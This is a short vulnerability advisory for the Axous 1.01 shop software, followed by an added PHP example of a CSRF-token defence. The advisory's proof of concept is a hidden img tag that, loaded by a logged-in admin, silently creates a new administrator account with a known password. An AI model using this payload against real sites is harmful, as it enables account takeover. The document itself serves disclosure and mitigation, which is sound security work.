axous101-xsrf.txt
Posted on 17 September 2010
<!------------------------------------------------------------------------
# Software................Axous 1.01
# Vulnerability...........Cross-site Request Forgery
# Download................http://www.axous.com/
# Release Date............9/16/2010
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................John Leitch
# Site....................http://www.johnleitch.net/
# Email...................john.leitch5@gmail.com
# ------------------------------------------------------------------------
#
# --Description--
#
# A cross-site request forgery vulnerability in Axous 1.01 can be
# exploited to create a new admin.
#
#
# --PoC-->
<html>
<body>
<img src="http://localhost/axous/admin/administrators_add.php?user_name=new_admin&new_passwd=Password1&new_passwd1=Password1&email=test%40test.com&dosubmit=1&id=&action=addnew" />
</body>
</html>
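The PoC above works because the "add administrator" handler accepts a state-changing request over GET, with no proof that the request came from the admin's own form. The following is an added mitigation example, not code from this advisory or from Axous: a synchronizer-token check in front of the handler, in the style of a PHP page such as administrators_add.php. The session key `csrf_token`, the form field name `csrf_token`, and the `add_administrator()` helper are assumptions for illustration.

```php
<?php
// Added example (not Axous code): guard a state-changing admin action against CSRF.
// Assumed names: $_SESSION['csrf_token'], the POST field 'csrf_token', and the
// add_administrator() helper that does the actual work.

session_start();

// Issue one unpredictable token per session; the admin form embeds it as a hidden field.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Compare the submitted token with the session token in constant time.
function csrf_valid(?string $submitted): bool {
    if ($submitted === null || $submitted === '' || empty($_SESSION['csrf_token'])) {
        return false;
    }
    return hash_equals($_SESSION['csrf_token'], $submitted);
}

// Render the admin-creation form with the hidden token field (shown on GET).
function render_form(): string {
    $token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    return '<form method="post" action="administrators_add.php">'
         . '<input type="hidden" name="csrf_token" value="' . $token . '">'
         . '<input name="user_name"><input type="password" name="new_passwd">'
         . '<input type="password" name="new_passwd1"><input name="email">'
         . '<button type="submit" name="dosubmit" value="1">Add</button></form>';
}

if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    // A forged <img src="..."> request is a GET: it never reaches the mutation below.
    echo render_form();
    exit;
}

// A cross-site form POST carries no valid token either, so it is rejected here.
if (!csrf_valid($_POST['csrf_token'] ?? null)) {
    http_response_code(403);
    exit('Forbidden: missing or invalid CSRF token');
}

// Only a same-origin POST with the session's token reaches the privileged action.
add_administrator($_POST['user_name'] ?? '', $_POST['new_passwd'] ?? '', $_POST['email'] ?? '');
```

Two properties matter: the mutation is reachable only over POST, so an image or link cannot trigger it, and the token is tied to the victim's session, so an attacker's page cannot know it. Rejecting the request with 403 before any database work also gives a clear log line for detecting forgery attempts.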